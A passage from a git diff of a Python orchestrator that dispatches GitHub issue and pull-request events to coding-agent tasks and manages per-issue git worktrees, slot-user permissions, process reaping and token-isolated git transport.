try: + evicted = await asyncio.to_thread(cache.gc) + if evicted: + log.info("natives_cache gc swept", extra={"evicted": evicted}) + except Exception: + log.exception("natives_cache gc raised") + except asyncio.CancelledError: + raise + + async def _dispatch_loop(self) -> None: + log.info("dispatch loop online") + try: + while not self._stop.is_set(): + row = await self._claim_next_unique() + if row is None: + self._wakeup.clear() + try: + await asyncio.wait_for(self._wakeup.wait(), timeout=10.0) + except TimeoutError: + pass + continue + # Schedule the task; the slot pool caps concurrent execution. + task = asyncio.create_task(self._run_event(row), name=f"robomp-event-{row.delivery_id[:8]}") + self._inflight_tasks[task] = row.delivery_id + task.add_done_callback(lambda t: self._inflight_tasks.pop(t, None)) + except asyncio.CancelledError: + raise + except Exception: + log.exception("dispatch loop crashed") + + async def _claim_next_unique(self) -> EventRow | None: + """Claim the next event whose issue isn't already inflight.""" + # The DB layer doesn't filter by issue_key; we peek then guard with a set. + async with self._inflight_lock: + # Naive but fine for v1 (small queue). + row = await asyncio.to_thread(self.db.claim_next_event) + if row is None: + return None + key = row.issue_key or row.delivery_id + if key in self._inflight: + # Put it back; another in-flight task is touching the same issue. + await asyncio.to_thread(self.db.requeue_event, row.delivery_id, from_states=("running",)) + # Sleep briefly so we don't spin. + await asyncio.sleep(0.5) + return None + self._inflight.add(key) + return row + + async def _release(self, row: EventRow) -> None: + key = row.issue_key or row.delivery_id + async with self._inflight_lock: + self._inflight.discard(key) + + def _arm_cancel(self, delivery_id: str, hook: Callable[[], None]) -> None: + """Worker-side: install the cancel hook. + + If cancellation was already requested before the worker reached this + point, fire the hook immediately so we don't lose the signal. + """ + if delivery_id in self._cancelled: + try: + hook() + except Exception: + log.exception("late cancel fire failed", extra={"delivery": delivery_id}) + return + self._cancel_hooks[delivery_id] = hook + + def _disarm_cancel(self, delivery_id: str) -> None: + """Worker-side: clear the cancel hook (the resource is gone).""" + self._cancel_hooks.pop(delivery_id, None) + + async def cancel_event(self, delivery_id: str) -> bool: + """Request cancellation of a running event. Returns whether a hook fired. + + Marks the delivery as cancelled regardless of whether a worker is + currently armed, so a late-armed hook still observes the request. The + worker thread's exception path is what eventually transitions the row + to `failed` with a cancellation marker. + """ + self._cancelled.add(delivery_id) + hook = self._cancel_hooks.pop(delivery_id, None) + if hook is None: + return False + # `hook` typically kills a subprocess; run it off the loop so its wait() + # doesn't stall the event loop for up to the omp shutdown grace period. + try: + await asyncio.to_thread(hook) + except Exception: + log.exception("cancel hook raised", extra={"delivery": delivery_id}) + return True + + async def _run_event(self, row: EventRow) -> None: + token = set_current_event(self, row.delivery_id) + slot_uid: int | None = None + slot_acquired = False + try: + if self._slot_pool is not None: + slot_uid = await self._slot_pool.acquire() + slot_acquired = True + await self._dispatch_and_mark(row, slot_uid=slot_uid) + elif self._semaphore is not None: + async with self._semaphore: + await self._dispatch_and_mark(row) + else: + await self._dispatch_and_mark(row) + except Exception as exc: + if row.delivery_id in self._shutdown_cancelled: + # `stop()` deliberately interrupted this delivery — + # leave the row in `running` so `reset_stuck_running()` + # flips it back to `queued` on the next start and the + # resumed omp session picks up via `--continue`. + # Other exceptions during the drain window (which + # would also see `_shutting_down=True`) MUST still + # mark the row failed; otherwise a genuine bug gets + # silently requeued. + log.info( + "event interrupted by shutdown", + extra={"delivery": row.delivery_id, "key": row.issue_key}, + ) + elif row.delivery_id in self._cancelled: + log.info("event cancelled", extra={"delivery": row.delivery_id}) + self.db.mark_event(row.delivery_id, "failed", error="cancelled by operator") + else: + tb = traceback.format_exc(limit=20) + log.exception("event handler failed", extra={"delivery": row.delivery_id}) + self.db.mark_event(row.delivery_id, "failed", error=f"{exc}\n{tb}") + finally: + self._cancelled.discard(row.delivery_id) + self._shutdown_cancelled.discard(row.delivery_id) + self._cancel_hooks.pop(row.delivery_id, None) + if slot_acquired and self._slot_pool is not None: + try: + _reap_slot(slot_uid) + finally: + self._slot_pool.release(slot_uid) + await self._release(row) + clear_current_event(token) + + async def _dispatch_and_mark(self, row: EventRow, *, slot_uid: int | None = None) -> None: + await self._dispatch(row, slot_uid=slot_uid) + if row.delivery_id in self._cancelled: + self.db.mark_event(row.delivery_id, "failed", error="cancelled by operator") + else: + self.db.mark_event(row.delivery_id, "done") + + async def _dispatch(self, row: EventRow, *, slot_uid: int | None = None) -> None: + event = row.event_type + action = str(row.payload.get("action") or "") + log.info( + "dispatch", + extra={ + "event": event, + "action": action, + "delivery": row.delivery_id, + "key": row.issue_key, + "attempts": row.attempts, + "recovered": row.attempts >= 2, + }, + ) + if event == "issues" and action == "opened": + await tasks.triage_issue( + settings=self.settings, + db=self.db, + github=self.github, + sandbox=self.sandbox, + git_transport=self.git_transport, + payload=row.payload, + delivery_id=row.delivery_id, + attempts=row.attempts, + slot_uid=slot_uid, + ) + elif event == "issue_comment" and action == "created": + issue = row.payload.get("issue") or {} + if "pull_request" in issue: + await tasks.handle_pr_conversation( + settings=self.settings, + db=self.db, + github=self.github, + sandbox=self.sandbox, + git_transport=self.git_transport, + payload=row.payload, + delivery_id=row.delivery_id, + attempts=row.attempts, + slot_uid=slot_uid, + ) + else: + await tasks.handle_comment( + settings=self.settings, + db=self.db, + github=self.github, + sandbox=self.sandbox, + git_transport=self.git_transport, + payload=row.payload, + delivery_id=row.delivery_id, + attempts=row.attempts, + slot_uid=slot_uid, + ) + elif event == "pull_request_review_comment" and action == "created": + await tasks.handle_review( + settings=self.settings, + db=self.db, + github=self.github, + sandbox=self.sandbox, + git_transport=self.git_transport, + payload=row.payload, + delivery_id=row.delivery_id, + attempts=row.attempts, + slot_uid=slot_uid, + ) + elif event == "issues" and action == "closed": + await tasks.cleanup_workspace( + settings=self.settings, + db=self.db, + sandbox=self.sandbox, + payload=row.payload, + target_state="closed", + ) + elif event == "pull_request" and action == "closed": + await tasks.cleanup_workspace( + settings=self.settings, + db=self.db, + sandbox=self.sandbox, + payload=row.payload, + target_state="merged", + ) + else: + log.info("no-op dispatch", extra={"event": event, "action": action}) + + +__all__ = ["WorkerPool"] diff --git a/python/robomp/src/sandbox.py b/python/robomp/src/sandbox.py new file mode 100644 index 000000000..904ea0ad9 --- /dev/null +++ b/python/robomp/src/sandbox.py @@ -0,0 +1,896 @@ +"""Per-issue workspace lifecycle: clone pool + git worktrees. + +The remote-facing git operations (clone, fetch, push) go through a pluggable +`GitTransport` so a deploy can keep the PAT entirely in a separate `gh-proxy` +container. The default `LocalGitTransport` runs git in-process with ephemeral +PAT injection via `--config-env` (see `robomp.git_ops`); the `ProxyGitTransport` +in `robomp.proxy_client` forwards the same set of operations over HMAC RPC. + +Per-issue worktree add/remove stays local — those operations only touch the +shared on-disk pool clone, no remote authentication required. + +Permission model +---------------- +There are four ownership zones on disk; do not let them blur: + +1. **Workspace tree** (`/data/workspaces/<key>/`, including `repo/`, + `.omp-session/`, `context/`, `artifacts/`, `.omp-tmp/`, `.omp-xdg/`): + single-owner. Owned by the active slot UID/GID (`omp-N`) with mode + `u=rwX,g=rwX,o=` (effectively `0770` dirs / `0660` files; the group is + the slot's own private gid so group bits are functionally identical to + owner-only). The orchestrator (root) reads/writes via uid-0 bypass when + it must, and drops to the slot for any subprocess that touches paths the + agent will revisit. `ensure_workspace` + `_chown_workspace` are the + single point of truth for this zone — no other helper sets ownership + inside `ws_root`. +2. **Clone pool** (`/data/workspaces/_pool/<owner>__<repo>/`): genuinely + multi-slot. Owned by `root:omp` (gid 2000) with setgid `02770`; cross-slot + writes are bridged by `_share_git_metadata_with_slots`. +3. **Language tool caches** (`/data/cache/{cargo,cargo-target,rustup,bun-cache}`): + multi-slot. Owned by `root:omp` with setgid `02770`; provisioned by + `entrypoint.sh`. +4. **Agent HOME template** (`/srv/agent-home`): read-only, `root:root` + `0755/0644`. + +Bun's install cache stays workspace-private (zone 1) on purpose — bun +chmod/utimes its own cache root, which breaks any shared-cache scheme. +""" + +from __future__ import annotations + +import hashlib +import logging +import os +import platform +import re +import secrets +import shutil +import signal +import stat +import subprocess +from dataclasses import dataclass +from pathlib import Path +from typing import Any, Protocol + +from robomp.git_ops import ( + GitCommandError, + PushResult, + redact_credentials, +) +from robomp.git_ops import ( + clone as git_clone, +) +from robomp.git_ops import ( + fetch_prune as git_fetch_prune, +) +from robomp.git_ops import ( + fetch_ref as git_fetch_ref, +) +from robomp.git_ops import ( + push as git_push, +) +from robomp.natives_cache import CacheHit, NativesCache +from robomp.natives_cache import compute_key as natives_compute_key + +log = logging.getLogger(__name__) + + +@dataclass(slots=True) +class Workspace: + """Resolved per-issue scratch space.""" + + root: Path + repo_dir: Path + session_dir: Path + context_dir: Path + artifacts_dir: Path + branch: str + repo_full_name: str + issue_number: int + + @property + def repro_dir(self) -> Path: + return self.context_dir / "repro" + + @property + def workspace_key(self) -> str: + return workspace_key(self.repo_full_name, self.issue_number) + + +def _slug(text: str, *, length: int = 40) -> str: + cleaned = re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-") + if not cleaned: + cleaned = "issue" + return cleaned[:length] + + +def _short_hex(seed: str | None = None) -> str: + if seed: + return hashlib.sha1(seed.encode("utf-8")).hexdigest()[:8] + return secrets.token_hex(4) + + +def workspace_key(repo: str, number: int) -> str: + return f"{repo.replace('/', '__')}__{number}" + + +def _safe_directory_env(repo_dir: Path) -> dict[str, str]: + """Return a Git config env overlay whitelisting ``repo_dir`` as safe.""" + return { + "GIT_CONFIG_COUNT": "1", + "GIT_CONFIG_KEY_0": "safe.directory", + "GIT_CONFIG_VALUE_0": str(repo_dir), + } + + +def _git_env_for_repo(repo_dir: Path) -> dict[str, str]: + env = os.environ.copy() + env.update(_safe_directory_env(repo_dir)) + env["GIT_TERMINAL_PROMPT"] = "0" + return env + + +def make_branch(*, issue_number: int, title: str, seed: str | None = None) -> str: + return f"farm/{_short_hex(seed or f'{issue_number}-{title}')}/{_slug(title or f'issue-{issue_number}')}" + + +_BRANCH_SLUG_RE = re.compile(r"^[a-z0-9]+(?:-[a-z0-9]+)*$") + + +def validate_branch_slug(slug: object) -> str: + """Return ``slug`` if it is a valid kebab-case branch slug, else raise. + + Rules: 1-50 chars, only ``[a-z0-9-]``, no leading/trailing hyphen, no + double hyphen. Raises ``ValueError`` otherwise. + """ + if not isinstance(slug, str) or not _BRANCH_SLUG_RE.fullmatch(slug) or len(slug) > 50: + raise ValueError( + f"invalid branch slug {slug!r}: expected kebab-case [a-z0-9-], 1-50 chars, no leading/trailing/double hyphen" + ) + return slug + + +def rename_workspace_branch( + workspace: Workspace, + new_slug: str, + *, + pr_number: int | None = None, + slot_uid: int | None = None, +) -> str: + """Rename the workspace's local branch to ``farm/<hex>/<new_slug>``. + + The 8-hex disambiguator stays untouched; only the trailing slug after + the second `/` changes. Runs ``git branch -m`` inside the worktree + (which updates the shared refs in the pool) and mutates + ``workspace.branch`` in place. + + Idempotent when the computed branch already matches ``workspace.branch``. + Raises ``ValueError`` for syntactically invalid slugs or for a + workspace whose branch isn't on the ``farm/<hex>/<slug>`` shape. + Raises ``GitCommandError`` if the underlying ``git`` invocation fails + (e.g. the target branch name is already taken). + + When ``pr_number`` is provided (non-None), the rename is a no-op: an + open PR on origin still tracks ``workspace.branch``, and renaming it + locally would orphan the PR by leaving its head on a branch that no + longer receives pushes. The slug is still validated so callers see + the same input errors as the rename path. + """ + validate_branch_slug(new_slug) + parts = workspace.branch.split("/", 2) + if len(parts) != 3 or parts[0] != "farm" or not parts[1]: + raise ValueError(f"refusing to rename non-farm branch {workspace.branch!r}") + new_branch = f"farm/{parts[1]}/{new_slug}" + if new_branch == workspace.branch: + return new_branch + if pr_number is not None: + log.warning( + "rename_workspace_branch skipped: PR #%d already tracks %r; refusing to rename to %r", + pr_number, + workspace.branch, + new_branch, + ) + return workspace.branch + proc = _safe_run( + ["git", "branch", "-m", workspace.branch, new_branch], + cwd=workspace.repo_dir, + **_slot_subprocess_kwargs(slot_uid), + ) + if proc.returncode != 0: + raise GitCommandError( + ["git", "branch", "-m", workspace.branch, new_branch], + proc.returncode, + proc.stdout, + proc.stderr, + ) + _share_git_metadata_with_slots(workspace.repo_dir, slot_uid) + workspace.branch = new_branch + return new_branch + + +# ---------- GitTransport (transport abstraction over clone/fetch/push) ---------- + + +class GitTransport(Protocol): + """Pluggable remote-facing git operations. + + Two implementations ship in-tree: + - `LocalGitTransport`: in-process git with PAT injected per invocation. + - `robomp.proxy_client.ProxyGitTransport`: forwards over HMAC RPC. + """ + + def clone_pool(self, *, repo: str, clone_url: str, default_branch: str, target: Path) -> None: + """Fresh clone into `target`. `target` must not exist (or be empty).""" + ... + + def fetch_pool(self, *, repo: str, pool_dir: Path) -> None: + """`git fetch --prune origin` against the shared pool clone.""" + ... + + def fetch_base_ref(self, *, repo: str, pool_dir: Path, ref: str) -> None: + """Best-effort `git fetch origin <ref>` to ensure the base branch is local.""" + ... + + def push_branch( + self, + *, + repo: str, + workspace_key: str, + repo_dir: Path, + branch: str, + expected_head: str, + slot_uid: int | None = None, + ) -> PushResult: + """Push `branch` to origin. MUST refuse if HEAD has drifted from `expected_head`.""" + ... + + +class LocalGitTransport: + """Default GitTransport: run git in-process with ephemeral PAT injection. + + `token` MAY be `None` for tests against a local bare repo (no auth) or in + deploys where the orchestrator does not hold a PAT (but then the proxy + transport should be used instead). + """ + + __slots__ = ("_token",) + + def __init__(self, token: str | None) -> None: + self._token = token + + def clone_pool(self, *, repo: str, clone_url: str, default_branch: str, target: Path) -> None: + del repo # unused; URL identifies the remote + git_clone(target, clone_url=clone_url, default_branch=default_branch, token=self._token) + + def fetch_pool(self, *, repo: str, pool_dir: Path) -> None: + del repo + git_fetch_prune(pool_dir, token=self._token) + + def fetch_base_ref(self, *, repo: str, pool_dir: Path, ref: str) -> None: + del repo + git_fetch_ref(pool_dir, ref, token=self._token) + + def push_branch( + self, + *, + repo: str, + workspace_key: str, + repo_dir: Path, + branch: str, + expected_head: str, + slot_uid: int | None = None, + ) -> PushResult: + del repo, workspace_key + return git_push(repo_dir, branch=branch, expected_head=expected_head, token=self._token, slot_uid=slot_uid) + + +# ---------- low-level helpers retained for callers expecting old shape ---------- + + +def _safe_run(cmd: list[str], *, cwd: Path | None = None, **kwargs: Any) -> subprocess.CompletedProcess[str]: + """Run without raising; caller decides on returncode. Credentials are redacted from any captured output.""" + proc = subprocess.run( + cmd, + cwd=str(cwd) if cwd else None, + check=False, + capture_output=True, + text=True, + **kwargs, + ) + if proc.stdout: + proc.stdout = redact_credentials(proc.stdout) + if proc.stderr: + proc.stderr = redact_credentials(proc.stderr) + return proc + + +def _run(cmd: list[str], *, cwd: Path | None = None) -> subprocess.CompletedProcess[str]: + """Legacy raising helper (still used by a sandbox test). Forwards to subprocess.run.""" + proc = subprocess.run( + cmd, + cwd=str(cwd) if cwd else None, + check=False, + capture_output=True, + text=True, + ) + if proc.returncode != 0: + raise GitCommandError(cmd, proc.returncode, proc.stdout, proc.stderr) + return proc + + +_SHARED_OMP_GID = 2000 + + +def _slot_permissions_active(slot_uid: int | None) -> bool: + return slot_uid is not None and platform.system() == "Linux" and os.geteuid() == 0 + + +def _slot_pids(slot_uid: int, proc_root: Path = Path("/proc")) -> tuple[int, ...]: + """Return non-zombie process ids owned by the slot UID. + + Debian's slim image does not include procps/pkill. Reading `/proc` keeps + slot cleanup self-contained and avoids adding a runtime package only for + this one operation. + """ + try: + entries = tuple(proc_root.iterdir()) + except OSError as exc: + log.warning("failed to scan %s for slot user %s: %s", proc_root, slot_uid, exc) + return () + + pids: list[int] = [] + for entry in entries: + if not entry.name.isdecimal(): + continue + try: + status = (entry / "status").read_text(encoding="utf-8") + except OSError: + # The process may have exited between `iterdir` and `read_text`. + continue + + state = "" + uids: tuple[int, ...] = () + for line in status.splitlines(): + if line.startswith("State:"): + parts = line.split(maxsplit=1) + state = parts[1] if len(parts) == 2 else "" + elif line.startswith("Uid:"): + try: + uids = tuple(int(part) for part in line.split()[1:5]) + except ValueError: + uids = () + + if state.startswith("Z"): + continue + if slot_uid in uids: + pids.append(int(entry.name)) + return tuple(pids) + + +def _reap_slot(slot_uid: int | None) -> None: + """Kill any processes still running as a slot UID. + + Slot UIDs are reused. A previous task's straggler process must not survive + long enough to observe or interfere with the next task assigned to that UID. + """ + if not _slot_permissions_active(slot_uid): + return + assert slot_uid is not None + for pid in _slot_pids(slot_uid): + try: + os.kill(pid, signal.SIGKILL) + except ProcessLookupError: + continue + except OSError as exc: + log.warning("failed to kill slot user %s process %s: %s", slot_uid, pid, exc) + + +def _prepare_slot_tmpdir(workspace: Workspace, slot_uid: int | None) -> Path: + """Return the per-workspace tmpdir path, idempotently provisioning it. + + Ownership/mode is set by ``_chown_workspace`` as part of the workspace's + single-ownership invariant; this helper only: + + - replaces any non-directory at ``.omp-tmp`` (symlink-protection: a user + who plants a symlink there could redirect later writes outside the + workspace regardless of who owns the destination), and + - ``mkdir(mode=0o700, exist_ok=True)`` as a safety net for callers that + run before ``ensure_workspace`` (e.g. unit tests with ``slot_uid=None``). + """ + del slot_uid # ownership is _chown_workspace's job; kept for call-site parity + tmpdir = workspace.root / ".omp-tmp" + try: + st = tmpdir.lstat() + except FileNotFoundError: + pass + else: + if not stat.S_ISDIR(st.st_mode): + tmpdir.unlink() + tmpdir.mkdir(mode=0o700, parents=True, exist_ok=True) + return tmpdir + + +def _slot_subprocess_kwargs(slot_uid: int | None) -> dict[str, Any]: + """Return subprocess identity kwargs for commands that should run as a slot. + + `preexec_fn` is intentionally avoided: the worker runs tasks in threads, + and `subprocess` warns that `preexec_fn` is unsafe in multithreaded + parents. Python's native `user` / `group` / `extra_groups` parameters do + the setuid/setgid work in the child safely. + """ + if not _slot_permissions_active(slot_uid): + return {} + assert slot_uid is not None + return {"user": slot_uid, "group": slot_uid, "extra_groups": [_SHARED_OMP_GID], "umask": 0o002} + + +def _prepare_slot_runtime_env(workspace: Workspace, slot_uid: int | None) -> dict[str, str]: + """Compute the env overlay (TMPDIR + XDG_*) for slot-side subprocesses. + + Pure env helper: ownership of the workspace tree (including these XDG + paths and the bun install cache) is the single responsibility of + ``ensure_workspace``/``_chown_workspace``. The mkdir calls here exist + only as a safety net for callers that bypass ``ensure_workspace`` (unit + tests) or for the case where a runtime dir was deleted mid-process. + + Cargo/rustup/target caches live under ``/data/cache/*`` (container ENV) + and are group-shared via ``omp``. Bun's install cache is explicitly + workspace-private because bun chmod/chowns its cache root, which makes a + cross-slot shared cache a permanent source of permission failures. + """ + tmpdir = _prepare_slot_tmpdir(workspace, slot_uid) + xdg_root = workspace.root / ".omp-xdg" + xdg_data = xdg_root / "data" + xdg_state = xdg_root / "state" + xdg_cache = xdg_root / "cache" + bun_cache = xdg_cache / "bun-install" + + for base in (xdg_data, xdg_state, xdg_cache): + base.mkdir(parents=True, exist_ok=True) + (base / "omp").mkdir(parents=True, exist_ok=True) + bun_cache.mkdir(parents=True, exist_ok=True) + + return { + "TMPDIR": str(tmpdir), + "TMP": str(tmpdir), + "TEMP": str(tmpdir), + "XDG_DATA_HOME": str(xdg_data), + "XDG_STATE_HOME": str(xdg_state), + "XDG_CACHE_HOME": str(xdg_cache), + "BUN_INSTALL_CACHE_DIR": str(bun_cache), + } + + +def _provision_runtime_dirs(ws_root: Path) -> None: + """Create the runtime dirs that ``_chown_workspace`` will hand to the slot. + + Runs immediately before ``_chown_workspace`` so the recursive chown sweep + picks up ``.omp-tmp`` and the per-workspace XDG tree. Without this, + ``_prepare_slot_runtime_env`` would create them later from the orchestrator + process — leaving root-owned cache roots that bun/biome/cargo cannot + chmod/utime, the original source of the recurring permission failures. + + Symlink-safe on ``.omp-tmp`` (replaces a planted non-directory in place). + """ + tmpdir = ws_root / ".omp-tmp" + try: + st = tmpdir.lstat() + except FileNotFoundError: + pass + else: + if not stat.S_ISDIR(st.st_mode): + tmpdir.unlink() + tmpdir.mkdir(mode=0o700, parents=True, exist_ok=True) + + xdg_root = ws_root / ".omp-xdg" + for sub in ("data", "state", "cache"): + base = xdg_root / sub + base.mkdir(parents=True, exist_ok=True) + (base / "omp").mkdir(parents=True, exist_ok=True) + (xdg_root / "cache" / "bun-install").mkdir(parents=True, exist_ok=True) + + +def _grant_group_bits(path: Path, *, gid: int, bits: int) -> None: + try: + st = path.lstat() + except FileNotFoundError: + return + if stat.S_ISLNK(st.st_mode): + return + os.chown(path, -1, gid) + path.chmod(stat.S_IMODE(st.st_mode) | bits) + + +def _grant_tree(path: Path, *, gid: int, files_group_writable: bool) -> None: + if not path.exists(): + return + if path.is_file(): + bits = stat.S_IRGRP | (stat.S_IWGRP if files_group_writable else 0) + _grant_group_bits(path, gid=gid, bits=bits) + return + for root, dirs, files in os.walk(path, followlinks=False): + root_path = Path(root) + _grant_group_bits(root_path, gid=gid, bits=stat.S_IRWXG | stat.S_ISGID) + for dirname in dirs: + _grant_group_bits(root_path / dirname, gid=gid, bits=stat.S_IRWXG | stat.S_ISGID) + file_bits = stat.S_IRGRP | (stat.S_IWGRP if files_group_writable else 0) + for filename in files: + _grant_group_bits(root_path / filename, gid=gid, bits=file_bits) + + +def _resolve_worktree_git_dirs(repo_dir: Path) -> tuple[Path, Path] | None: + marker = repo_dir / ".git" + if marker.is_dir(): + return marker, marker + try: + text = marker.read_text(encoding="utf-8").strip() + except OSError: + return None + prefix = "gitdir:" + if not text.startswith(prefix): + return None + raw_git_dir = text[len(prefix) :].strip() + git_dir = Path(raw_git_dir) + if not git_dir.is_absolute(): + git_dir = (repo_dir / git_dir).resolve() + try: + raw_common_dir = (git_dir / "commondir").read_text(encoding="utf-8").strip() + except OSError: + return git_dir, git_dir + common_dir = Path(raw_common_dir) + if not common_dir.is_absolute(): + common_dir = (git_dir / common_dir).resolve() + return git_dir, common_dir + + +def _share_git_metadata_with_slots(repo_dir: Path, slot_uid: int | None) -> None: + """Keep shared Git metadata writable by whichever slot gets the retry. + + The worktree checkout itself is slot-private, but `.git` in a Git worktree + points back into the shared clone pool. A retry may run as a different + `omp-N` user, so the pool-side worktree gitdir, refs, reflogs, and object + directories must stay writable through the shared `omp` group. + """ + if not _slot_permissions_active(slot_uid): + return + dirs = _resolve_worktree_git_dirs(repo_dir) + if dirs is None: + return + git_dir, common_dir = dirs + gid = _SHARED_OMP_GID + _grant_tree(git_dir, gid=gid, files_group_writable=True) + _grant_group_bits(common_dir, gid=gid, bits=stat.S_IRWXG | stat.S_ISGID) + for rel, files_group_writable in ( + ("objects", False), + ("refs", True), + ("logs", True), + ("worktrees", True), + ): + _grant_tree(common_dir / rel, gid=gid, files_group_writable=files_group_writable) + for rel in ("config", "packed-refs", "HEAD", "FETCH_HEAD", "ORIG_HEAD"): + _grant_tree(common_dir / rel, gid=gid, files_group_writable=True) + + +def _chown_workspace(ws_root: Path, slot_uid: int | None) -> None: + """Hand the entire workspace tree to the active slot UID/GID. + + Single-ownership invariant: every file under ``ws_root`` ends up owned by + ``slot_uid:slot_uid`` with mode ``u=rwX,g=rwX,o=`` (``0770`` dirs / ``0660`` + files). The slot's GID is its own private gid (created by entrypoint.sh), + so the group bits are functionally identical to owner-only — they exist + for parity with the existing pattern and to make accidental future + ``setgid`` use safe. + + The orchestrator (root) keeps read/write access via uid-0 bypass; any + subprocess that touches paths the agent will revisit MUST drop to the slot + via ``_slot_subprocess_kwargs`` so tools like bun/biome/cargo (which + chmod/utime their own cache state) never encounter a non-owner file. + + Self-healing on re-entry: an existing workspace left over from the old + ``root:slot`` model gets re-chown'd on the next ``ensure_workspace`` call. + """ + if slot_uid is None: + return + if platform.system() != "Linux": + return + if os.geteuid() != 0: + return + subprocess.run(["chown", "-R", f"{slot_uid}:{slot_uid}", str(ws_root)], check=True) + subprocess.run(["chmod", "-R", "u=rwX,g=rwX,o=", str(ws_root)], check=True) + + +# ---------- SandboxManager ---------- + + +class SandboxManager: + """Manages a shared clone pool and per-issue worktrees. + + Remote-facing git operations are delegated to a `GitTransport`; the rest + (worktree add/remove, identity config, directory layout) is purely local. + """ + + def __init__( + self, + root: Path, + *, + transport: GitTransport | None = None, + natives_cache: NativesCache | None = None, + ) -> None: + self.root = root + self.pool = root / "_pool" + self.transport: GitTransport = transport or LocalGitTransport(token=None) + self.natives_cache = natives_cache + root.mkdir(parents=True, exist_ok=True) + self.pool.mkdir(parents=True, exist_ok=True) + + # ---- pool ---- + def pool_path(self, repo: str) -> Path: + return self.pool / repo.replace("/", "__") + + def ensure_clone(self, *, repo: str, clone_url: str, default_branch: str) -> Path: + """Idempotent shared clone for `repo`. + + `clone_url` MUST be a plain `https://github.com/<owner>/<repo>.git` + (no embedded credentials). Auth is supplied per-call by the transport. + """ + target = self.pool_path(repo) + if (target / ".git").exists() or (target / "HEAD").exists(): + # Idempotent refresh. An older deploy may have baked a + # credentialed `https://user:pass@github.com/...` into + # `.git/config`; rewrite to the credential-free URL we now own + # before fetching so the PAT never persists on disk. + self._reset_origin_url(target, clone_url) + self.transport.fetch_pool(repo=repo, pool_dir=target) + return target + target.mkdir(parents=True, exist_ok=True) + self.transport.clone_pool( + repo=repo, + clone_url=clone_url, + default_branch=default_branch, + target=target, + ) + return target + + @staticmethod + def _reset_origin_url(repo_dir: Path, clone_url: str) -> None: + """`git remote set-url origin <clone_url>` if origin exists and differs. + + Best-effort: silent no-op on failure (probe `get-url` first so we don't + spam logs on first-time clones where origin isn't configured yet). + """ + probe = _safe_run(["git", "remote", "get-url", "origin"], cwd=repo_dir) + if probe.returncode != 0: + return + if probe.stdout.strip() == clone_url: + return + _safe_run(["git", "remote", "set-url", "origin", clone_url], cwd=repo_dir) + + # ---- per-issue workspace ---- + def workspace_root(self, repo: str, number: int) -> Path: + return self.root / workspace_key(repo, number) + + def ensure_workspace( + self, + *, + repo: str, + number: int, + title: str, + clone_url: str, + default_branch: str, + existing_branch: str | None = None, + author_name: str, + author_email: str, + slot_uid: int | None = None, + ) -> Workspace: + """Create or resume a per-issue worktree.""" + pool = self.ensure_clone(repo=repo, clone_url=clone_url, default_branch=default_branch) + ws_root = self.workspace_root(repo, number) + repo_dir = ws_root / "repo" + session_dir = ws_root / ".omp-session" + context_dir = ws_root / "context" + artifacts_dir = ws_root / "artifacts" + for path in (ws_root, session_dir, context_dir, context_dir / "repro", artifacts_dir): + path.mkdir(parents=True, exist_ok=True) + + branch = existing_branch or make_branch( + issue_number=number, + title=title, + seed=f"{repo}#{number}", + ) + + repo_exists = (repo_dir / ".git").exists() + workspace_prepared = False + slot_git_kwargs = _slot_subprocess_kwargs(slot_uid) + slot_git_env: dict[str, str] | None = None + if repo_exists: + # Existing workspaces are already slot-owned from the previous run. + # Refresh pool-side group bits, then hand the tree to the current + # slot before running any git command inside the worktree; root's + # uid-0 bypass does not bypass git's safe.directory ownership check. + _share_git_metadata_with_slots(repo_dir, slot_uid) + _provision_runtime_dirs(ws_root) + _chown_workspace(ws_root, slot_uid) + workspace_prepared = True + if not repo_exists: + # Make sure the requested start point exists locally (best-effort). + # For follow-ups on an existing PR, `existing_branch` is the remote + # head branch we need to amend; starting from default would silently + # lose the PR's current commits if the local pool branch is absent. + self.transport.fetch_base_ref(repo=repo, pool_dir=pool, ref=existing_branch or default_branch) + check = _safe_run(["git", "rev-parse", "--verify", f"refs/heads/{branch}"], cwd=pool) + if check.returncode == 0: + _run(["git", "worktree", "add", str(repo_dir), branch], cwd=pool) + else: + start_point = f"origin/{default_branch}" + if existing_branch: + remote = _safe_run( + ["git", "rev-parse", "--verify", f"refs/remotes/origin/{existing_branch}"], + cwd=pool, + ) + if remote.returncode == 0: + start_point = f"origin/{existing_branch}" + _run( + [ + "git", + "worktree", + "add", + "-b", + branch, + str(repo_dir), + start_point, + ], + cwd=pool, + ) + else: + slot_git_env = _git_env_for_repo(repo_dir) + current = _safe_run( + ["git", "symbolic-ref", "--quiet", "--short", "HEAD"], + cwd=repo_dir, + env=slot_git_env, + **slot_git_kwargs, + ) + if current.returncode == 0 and current.stdout.strip(): + branch = current.stdout.strip() + if existing_branch is not None and existing_branch != branch: + log.warning( + "workspace branch mapping %r differs from checked-out branch %r; using checkout", + existing_branch, + branch, + ) + if not workspace_prepared: + _share_git_metadata_with_slots(repo_dir, slot_uid) + _provision_runtime_dirs(ws_root) + _chown_workspace(ws_root, slot_uid) + if slot_git_env is None: + slot_git_env = _git_env_for_repo(repo_dir) + # Identity is set on the worktree's shared config; idempotent. Run as + # the slot after the chown so git never trips over safe.directory. + for command in (["git", "config", "user.email", author_email], ["git", "config", "user.name", author_name]): + proc = _safe_run(command, cwd=repo_dir, env=slot_git_env, **slot_git_kwargs) + if proc.returncode != 0: + raise GitCommandError(command, proc.returncode, proc.stdout, proc.stderr) + _share_git_metadata_with_slots(repo_dir, slot_uid) + workspace = Workspace( + root=ws_root, + repo_dir=repo_dir, + session_dir=session_dir, + context_dir=context_dir, + artifacts_dir=artifacts_dir, + branch=branch, + repo_full_name=repo, + issue_number=number, + ) + # Best-effort: hardlink pre-built natives in if we've cached this + # source state before. Runs AFTER the slot chown so the cache inode + # keeps its `root:omp` ownership (the slot reads through group `omp`); + # write-temp + rename in the napi build replaces with a new inode if + # the agent rebuilds, so the cached file is never mutated. + self._populate_natives_cache(workspace, slot_uid=slot_uid) + return workspace + + def _populate_natives_cache(self, workspace: Workspace, *, slot_uid: int | None = None) -> None: + """Try to hardlink cached pi-natives artifacts into the worktree. + + Best-effort: any failure (no cache configured, non-git worktree, + cache miss, link error) is logged at debug and swallowed. The agent + falls back to a fresh napi build, exactly as it would without the + cache. + + Post-populate, the populated `packages/natives/native/` directory + and the COPIED companion files are chowned to the slot so the slot + can rebuild via temp + rename in that directory. The hardlinked + `.node` files are LEFT at `root:omp` ownership — chowning them + would chown the cache file too (shared inode), breaking the + cross-slot sharing model. The slot reads them via group `omp`. + """ + cache = self.natives_cache + if cache is None: + return + native_dir = workspace.repo_dir / "packages" / 